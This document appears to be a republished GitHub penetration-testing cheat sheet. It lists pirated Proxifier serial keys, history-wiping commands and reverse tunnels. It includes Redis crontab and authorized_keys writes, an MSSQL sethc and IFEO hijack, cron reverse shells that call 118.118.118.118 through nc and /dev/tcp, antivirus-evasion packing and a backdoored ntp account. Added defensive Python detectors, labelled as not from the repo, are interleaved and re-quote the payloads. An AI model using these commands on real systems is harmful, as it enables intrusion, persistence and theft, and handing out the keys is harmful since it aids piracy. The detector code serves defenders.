ring04h/pentest: stuff used for penetration testing
2019-07-03 00:23:05 Author: github.com (view original) Views: 290


A pile of copy-paste, nothing technically sophisticated.

Toolset

proxifier

Download: http://www.proxifier.com/download/

Serial numbers
L6Z8A-XY2J4-BTZ3P-ZZ7DF-A2Q9C(Portable Edition)
5EZ8G-C3WL5-B56YG-SCXM9-6QZAP(Standard Edition)
P427L-9Y552-5433E-8DSR3-58Z68(MAC)

proxychains-ng

# The advantage of using a Mac!!!
brew install proxychains-ng

Frequently used commands

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
python -c 'import pty; pty.spawn("/bin/sh")'
ssh -C -f -N -g -R 3389:10.0.0.1:3389 [email protected]

plink.exe -C -N -R 3389:127.0.0.1:3389 [email protected] -pw 123456 -P 443

set 0 "\n\n\n* * * * * bash -i >& /dev/tcp/118.118.118.118/53 0>&1\n\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
config set dir /var/lib/redis
config set dbfilename dump.rdb

cat foo.txt | redis-cli -h 10.10.10.10 -x set 0
config set dir /root/.ssh
config set dbfilename "authorized_keys"
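Defender's view of the Redis commands above. What follows is an added example, not code from ring04h/pentest: a Python audit over `redis-cli MONITOR` output that flags the CONFIG SET dir / dbfilename + SAVE sequence that turns an RDB dump into a crontab or authorized_keys file, and the crontab-shaped or SSH-key-shaped payload that precedes it. The sensitive-path list, the finding names and the sample MONITOR lines are constructed for this example; the MONITOR line layout is the one redis-cli prints.

```python
"""Audit redis-cli MONITOR output for the CONFIG SET dir/dbfilename + SAVE
pattern that turns an RDB dump into a crontab or authorized_keys file.

Added defensive example; not part of ring04h/pentest. Sample lines are
constructed in the layout `redis-cli MONITOR` prints, not captured traffic.
"""
import re
import shlex

# Directories where a dumped RDB file gets executed or trusted rather than
# merely stored (cron spools, SSH key dirs, web roots). Constructed list.
SENSITIVE_DIR_PREFIXES = ("/var/spool/cron", "/etc/cron", "/root/.ssh", "/home/", "/var/www")
SENSITIVE_FILENAMES = {"authorized_keys", "root", "id_rsa"}
SSH_KEY_MARKERS = ("ssh-rsa ", "ssh-ed25519 ", "ecdsa-sha2-")

MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$')
# Five cron schedule fields followed by a command word.
CRON_LINE_RE = re.compile(r'(?:\*|\d+)(?:/\d+)?(?:\s+(?:\*|\d+)(?:/\d+)?){4}\s+\S')


def parse_monitor_line(line):
    """Return {'ts', 'client', 'args'} for one MONITOR line, or None."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    try:
        args = shlex.split(m.group("args"))   # MONITOR quotes every argument
    except ValueError:                         # truncated line, unbalanced quotes
        return None
    return {"ts": float(m.group("ts")), "client": m.group("client"), "args": args}


def audit_redis_monitor(lines):
    """Track dir/dbfilename per client connection and return findings as
    (client, kind, detail) tuples in the order they were observed."""
    findings = []
    state = {}
    for line in lines:
        rec = parse_monitor_line(line)
        if not rec or not rec["args"]:
            continue
        client, args = rec["client"], rec["args"]
        cmd = args[0].lower()
        st = state.setdefault(client, {"dir": None, "dbfilename": "dump.rdb"})
        if cmd == "config" and len(args) >= 4 and args[1].lower() == "set":
            key, value = args[2].lower(), args[3]
            if key == "dir":
                st["dir"] = value
                if value.startswith(SENSITIVE_DIR_PREFIXES):
                    findings.append((client, "config-dir", value))
            elif key == "dbfilename":
                st["dbfilename"] = value
                if value in SENSITIVE_FILENAMES or not value.endswith(".rdb"):
                    findings.append((client, "config-dbfilename", value))
        elif cmd in ("save", "bgsave"):
            # The dump lands wherever dir currently points for this connection.
            if st["dir"] and st["dir"].startswith(SENSITIVE_DIR_PREFIXES):
                findings.append((client, "rdb-save", f"{st['dir']}/{st['dbfilename']}"))
        elif cmd in ("set", "setex", "append", "mset") and len(args) >= 3:
            payload = " ".join(args[1:])      # value position differs per command
            if "*" in payload and CRON_LINE_RE.search(payload):
                findings.append((client, "cron-payload", args[1]))
            elif any(mk in payload for mk in SSH_KEY_MARKERS):
                findings.append((client, "sshkey-payload", args[1]))
    return findings


# Constructed MONITOR lines: one client replays the page's crontab write,
# another does ordinary session traffic.
SAMPLE_MONITOR = [
    r'1562112000.000001 [0 10.10.10.50:41000] "config" "set" "dir" "/var/spool/cron"',
    r'1562112000.000002 [0 10.10.10.50:41000] "config" "set" "dbfilename" "root"',
    r'1562112000.000003 [0 10.10.10.50:41000] "set" "0" "\n\n\n* * * * * bash -i >& /dev/tcp/118.118.118.118/53 0>&1\n\n\n"',
    r'1562112000.000004 [0 10.10.10.50:41000] "save"',
    r'1562112000.000005 [0 10.10.10.50:41000] "config" "set" "dir" "/var/lib/redis"',
    r'1562112000.000006 [0 10.10.10.50:41000] "config" "set" "dbfilename" "dump.rdb"',
    r'1562112000.000007 [0 10.10.10.20:52000] "get" "session:7f3a"',
    r'1562112000.000008 [0 10.10.10.20:52000] "set" "session:7f3a" "{\"user\":\"alice\"}"',
]

if __name__ == "__main__":
    for client, kind, detail in audit_redis_monitor(SAMPLE_MONITOR):
        print(f"{client}\t{kind}\t{detail}")
```

The same sequence is blocked at the source by redis.conf settings: `protected-mode yes`, `bind 127.0.0.1`, `requirepass`, and `rename-command CONFIG ""` remove unauthenticated CONFIG SET entirely, and running redis-server as an unprivileged user means a dir of /var/spool/cron or /root/.ssh fails with a permission error even if CONFIG is reachable.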

Simple operations

# MSSQL: replace a system file
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile', null, 'c:\windows\system32\cmd.exe', 'c:\windows\system32\sethc.exe';

# IFEO hijack
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='c:\windows\system32\cmd.exe'

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
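The xp_regread above checks one key by hand. As an added example (not from ring04h/pentest), the following Python parses the output of reg.exe's recursive query over the IFEO tree and classifies each Debugger entry, so a responder can sweep a host instead of checking sethc.exe alone. The shell-binary list, the severity labels and the sample reg output are constructed for this example; the reg query command and its output layout are real.

```python
"""Parse `reg query ... /s /v Debugger` output and flag Image File Execution
Options Debugger values that redirect a program to a shell.

Added defensive example; not part of ring04h/pentest. Collect real input with:
  reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s /v Debugger
The sample output below is constructed in reg.exe's layout, not captured.
"""
import ntpath
import re

IFEO_KEY_RE = re.compile(
    r"^HKEY_[A-Z_]+\\.*\\Image File Execution Options\\(?P<image>[^\\]+)$", re.IGNORECASE)
VALUE_RE = re.compile(
    r"^\s+Debugger\s+REG_(?:SZ|EXPAND_SZ)\s+(?P<debugger>.+?)\s*$", re.IGNORECASE)

# A Debugger pointing at an interpreter is never a debugger. Constructed list.
SHELL_BINARIES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# sethc.exe (Sticky Keys) is launched from the logon screen as SYSTEM, so a
# Debugger on it is the pre-auth shell the page's xp_regwrite sets up.
PRE_AUTH_IMAGES = {"sethc.exe"}


def parse_reg_query(text):
    """Yield (image, debugger_value) pairs from reg.exe output."""
    entries = []
    image = None
    for raw in text.splitlines():
        line = raw.rstrip()
        km = IFEO_KEY_RE.match(line)
        if km:
            image = km.group("image")
            continue
        vm = VALUE_RE.match(line)
        if vm and image:
            entries.append((image, vm.group("debugger")))
    return entries


def first_executable(value):
    """Basename of the program in a Debugger value, which may be quoted
    and may carry arguments after the path."""
    v = value.strip()
    if v.startswith('"'):
        end = v.find('"', 1)
        v = v[1:end] if end > 0 else v[1:]
    else:
        v = v.split()[0] if v.split() else v
    return ntpath.basename(v).lower()


def audit_ifeo(text):
    """Return one finding per Debugger entry with a severity label."""
    findings = []
    for image, debugger in parse_reg_query(text):
        exe = first_executable(debugger)
        if image.lower() in PRE_AUTH_IMAGES or exe in SHELL_BINARIES:
            severity = "high"
        else:
            # Real debugger registrations exist; confirm the binary before acting.
            severity = "review"
        findings.append({"image": image, "debugger": debugger, "severity": severity})
    return findings


# Constructed reg.exe output: the page's sethc.exe entry plus a benign-looking
# tool registration (placeholder path, not a real product).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE
    Debugger    REG_SZ    c:\windows\system32\cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe
    Debugger    REG_SZ    "C:\Program Files\ExampleTool\exampletool.exe" /t

End of search: 2 match(es) found.
"""

if __name__ == "__main__":
    for f in audit_ifeo(SAMPLE_REG_QUERY):
        print(f"[{f['severity']}] {f['image']} -> {f['debugger']}")
```

Remediation for a confirmed entry is `reg delete "HKLM\...\Image File Execution Options\sethc.exe" /v Debugger /f`, and `sfc /verifyfile=c:\windows\system32\sethc.exe` checks whether the binary itself was swapped as in the copyfile step. Both SQL Server vectors need sysadmin plus a service account that can write HKLM and System32, so application logins without sysadmin and a non-LocalSystem service account close them.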

Querying data from ES (Elasticsearch)

List indices
http://10.10.10.10:9200/_cat/indices

Search data
http://10.10.10.10:9200/hello/_search?pretty&size=50&from=50

Short-term persistence

(crontab -l;echo '*/60 * * * * rm /tmp/yum.log;mkfifo /tmp/yum.log;cat /tmp/yum.log|/bin/sh -i 2>&1|/usr/bin/nc  -w 3 118.118.118.118 53 >/tmp/yum.log')|crontab -
(crontab -l;echo '*/5 * * * * rm /tmp/yum.log;mkfifo /tmp/yum.log;cat /tmp/yum.log|/bin/sh -i 2>&1|/usr/bin/nc 118.118.118.118 53 >/tmp/yum.log')|crontab -

(crontab -l;echo '*/1 * * * * exec 9<> /dev/tcp/118.118.118.118/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -

Buy the latest packer for quick AV evasion

Supports WeChat Pay, how cute
https://vmpsoft.com/purchase/buy-online/

Reuse an existing user by adding a password

# Replace the user's shell
usermod -s /bin/bash ntp
usermod -g root ntp # give root privileges
passwd ntp # add a password, change the id in /etc/passwd to 0
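Both the cron reverse shells under "Short-term persistence" and the ntp account changes above leave flat-file traces. As an added example (not from ring04h/pentest), the following Python audits crontab entries for reverse-shell indicators and /etc/passwd plus /etc/shadow for a non-root account with UID or GID 0, a system account given a login shell, or a system account given a password. The indicator names, the shell list and the sample crontab, passwd and shadow lines are constructed for this example (the 118.118.118.118 address is the page's own placeholder).

```python
"""Audit crontab entries and /etc/passwd + /etc/shadow for the persistence
left by the cron reverse shells and the `usermod -g root ntp` trick.

Added defensive example; not part of ring04h/pentest. All sample data is
constructed. On a real host feed it the lines of /var/spool/cron/* (or
/var/spool/cron/crontabs/*), /etc/cron.d/*, /etc/passwd and /etc/shadow.
"""
import re

# Each indicator is a piece of the page's own cron payloads. Constructed names.
REVERSE_SHELL_PATTERNS = {
    "dev-tcp":   re.compile(r"/dev/tcp/"),
    "fifo-pipe": re.compile(r"\bmkfifo\b"),
    "netcat":    re.compile(r"(?:^|[\s|/])nc(?:at)?\b"),
    "inter-sh":  re.compile(r"\b(?:ba)?sh\b[^|;]*\s-i\b"),   # sh -i / bash ... -i
    "fd-dup":    re.compile(r"exec\s+\d+<>"),                # exec 9<> /dev/tcp/...
}
CRON_FIELD_RE = re.compile(r"^(\S+\s+){5}(?P<cmd>.+)$")

# Shells that give an interactive login. Constructed; /etc/shells is the real source.
INTERACTIVE_SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/bin/dash", "/usr/bin/bash", "/usr/bin/zsh"}
SYSTEM_UID_MAX = 999   # default SYS_UID_MAX on Debian and RHEL families


def parse_crontab(lines):
    """Yield (entry, command) for each job line, skipping comments and VAR=value lines."""
    for line in lines:
        s = line.strip()
        if not s or s.startswith("#") or "=" in s.split()[0]:
            continue
        if s.startswith("@"):                      # @reboot, @hourly, ...
            parts = s.split(None, 1)
            if len(parts) == 2:
                yield s, parts[1]
            continue
        m = CRON_FIELD_RE.match(s)
        if m:
            yield s, m.group("cmd")


def audit_crontab(lines):
    """Return [{'entry', 'indicators'}] for job lines matching any indicator."""
    findings = []
    for entry, cmd in parse_crontab(lines):
        hits = [name for name, rx in REVERSE_SHELL_PATTERNS.items() if rx.search(cmd)]
        if hits:
            findings.append({"entry": entry, "indicators": hits})
    return findings


def audit_accounts(passwd_lines, shadow_lines=()):
    """Return (user, kind) findings for UID/GID 0 aliases and for system
    accounts that gained a login shell or a usable password hash."""
    shadow = {}
    for line in shadow_lines:
        parts = line.strip().split(":")
        if len(parts) >= 2:
            shadow[parts[0]] = parts[1]
    findings = []
    for line in passwd_lines:
        parts = line.strip().split(":")
        if len(parts) != 7:
            continue
        name, _, uid, gid, _, _, shell = parts
        try:
            uid, gid = int(uid), int(gid)
        except ValueError:
            continue
        if uid == 0 and name != "root":
            findings.append((name, "uid0-alias"))
        if gid == 0 and name != "root":
            findings.append((name, "gid0-primary"))
        is_system = uid != 0 and uid <= SYSTEM_UID_MAX
        if is_system and shell in INTERACTIVE_SHELLS:
            findings.append((name, "system-account-login-shell"))
        # Locked fields are "*", "!" or "!!"; a real hash starts with "$".
        if is_system and shadow.get(name, "").startswith("$"):
            findings.append((name, "system-account-password-set"))
    return findings


# Constructed samples: one legitimate job, the page's two cron payloads, and
# an ntp account after the usermod/passwd steps above.
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/local/bin/backup.sh",
    "*/1 * * * * exec 9<> /dev/tcp/118.118.118.118/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i",
    "*/5 * * * * rm /tmp/yum.log;mkfifo /tmp/yum.log;cat /tmp/yum.log|/bin/sh -i 2>&1|/usr/bin/nc 118.118.118.118 53 >/tmp/yum.log",
]
SAMPLE_PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "ntp:x:108:0::/nonexistent:/bin/bash",
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash",
]
SAMPLE_SHADOW = [
    "root:$6$constructed$hash1:18000:0:99999:7:::",
    "daemon:*:18000:0:99999:7:::",
    "ntp:$6$constructed$hash2:18080:0:99999:7:::",
    "alice:$6$constructed$hash3:18000:0:99999:7:::",
]

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print("cron", f["indicators"], f["entry"])
    for user, kind in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print("account", user, kind)
```

The crontab check is cheap enough to run from a file-integrity job on the spool directories; the account check pairs with an alert on any /etc/passwd or /etc/shadow modification, since a service account such as ntp should never acquire a primary GID of 0, a login shell or a password hash.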

Source: https://github.com/ring04h/pentest